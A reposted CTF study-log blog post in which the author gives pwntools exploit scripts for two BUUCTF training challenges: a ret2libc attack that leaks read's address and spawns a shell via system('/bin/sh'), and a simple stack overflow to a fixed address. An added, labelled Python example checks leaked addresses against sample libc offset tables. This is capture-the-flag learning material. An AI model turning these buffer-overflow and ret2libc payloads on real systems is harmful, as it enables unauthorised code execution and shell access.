21.07.21 Study Summary

Column: July 21, 2021
Tags: learning experience

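I was away doing training work for the past five days, worked to exhaustion with no time to study anything else. Luckily the pay was decent... otherwise it would have been a big loss.

16:00-16:30: Answered customers' pwn questions and did two challenges... (one particular write, one format string)

23:30-24:00: Did two BUU challenges, finally finished the first page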

jarvisoj_level3:

A very boring ret2libc, and the libc they provide is damn well the wrong one; I recommend using LibcSearcher.

#!/usr/bin/env python3
# coding=utf-8
from pwn import *
#sh=process('./level3')
sh=remote('node4.buuoj.cn',29641)
elf=ELF('./level3')
libc=ELF('./libc-2.19.so')
#libc=elf.libc
context.log_level='debug'

vuln_addr=elf.sym['main']
ret_addr=0x80482da
#gdb.attach(sh)
sh.recv()
# Stage 1: 140 bytes of padding, then write(1, got['read'], 4) to leak read's address, returning to main
payload1=b'w'*140+p32(elf.plt['write'])+p32(vuln_addr)+p32(1)+p32(elf.got['read'])+p32(4)
sh.send(payload1)
read_addr=u32(sh.recv(4))
log.success('read addr: '+hex(read_addr))
# The offsets below are only valid if libc-2.19.so is the same build the remote uses
libc_base=read_addr-libc.sym['read']
system_addr=libc_base+libc.sym['system']
binsh_addr=libc_base+next(libc.search(b'/bin/sh'))

# Stage 2: 35 ret gadgets (140 bytes) in place of padding, then system("/bin/sh") with a dummy return address
payload2=p32(ret_addr)*35+p32(system_addr)+p32(0x11111111)+p32(binsh_addr)
sh.send(payload2)
sh.interactive()
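Why a mismatched libc file breaks the offset arithmetic in the ret2libc script above, shown as an added example that is not part of the original post: ASLR moves libc by whole 4 KiB pages, so a leaked address minus the correct symbol offset must give a page-aligned base, and every leaked symbol must agree on it. The build names and offset tables are constructed sample values, not real libc builds, and the function names are hypothetical.

```python
PAGE_MASK = 0xFFF  # low 12 bits of a symbol address are unaffected by ASLR

# Constructed sample offset tables (hypothetical build names, not real libc builds)
CANDIDATES = {
    "libc-build-a": {"read": 0x0D4350, "write": 0x0D43C0, "system": 0x03A940},
    "libc-build-b": {"read": 0x0DABD0, "write": 0x0DAC50, "system": 0x040310},
}

def consistent_base(leaks, offsets):
    """Return the libc base implied by leaks ({symbol: runtime address}) if every
    leaked symbol agrees on one page-aligned base for this offset table, else None."""
    bases = set()
    for name, addr in leaks.items():
        if name not in offsets:
            return None
        bases.add(addr - offsets[name])
    if len(bases) != 1:          # no leaks, or the leaks disagree: wrong build
        return None
    base = bases.pop()
    if base <= 0 or base & PAGE_MASK:   # a real mapping base is page-aligned
        return None
    return base

def match_libc(leaks, candidates=CANDIDATES):
    """Map each candidate build that is consistent with the leaks to its base."""
    result = {}
    for build, offsets in candidates.items():
        base = consistent_base(leaks, offsets)
        if base is not None:
            result[build] = base
    return result

if __name__ == "__main__":
    # Constructed leak: read() as seen at runtime when build-b is loaded at 0xf7d50000
    leaks = {"read": 0xF7E2ABD0}
    for build, base in match_libc(leaks).items():
        print(build, hex(base))
```

Leaking a second GOT entry and passing both addresses narrows the candidates further, since a wrong build rarely agrees on two symbols at once.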

jarvisoj_tell_me_something:

Baby-level orw:

#!/usr/bin/env python3
# coding=utf-8
from pwn import *
#sh=process('./guestbook')
sh=remote('node4.buuoj.cn',28344)
#context.log_level='debug'

sh.recv()
# 0x88 bytes of padding, then overwrite the return address with 0x400620
sh.send(b'a'*0x88+p64(0x400620))
sh.recv()
sh.interactive()

Goals for tomorrow:

Two BUU challenges

Reproduce EzCloud from the Qiangwang Cup 2021 online round

Finish at least exercise 3 of ucore lab1

Reposted from blog.csdn.net/eeeeeight/article/details/118980016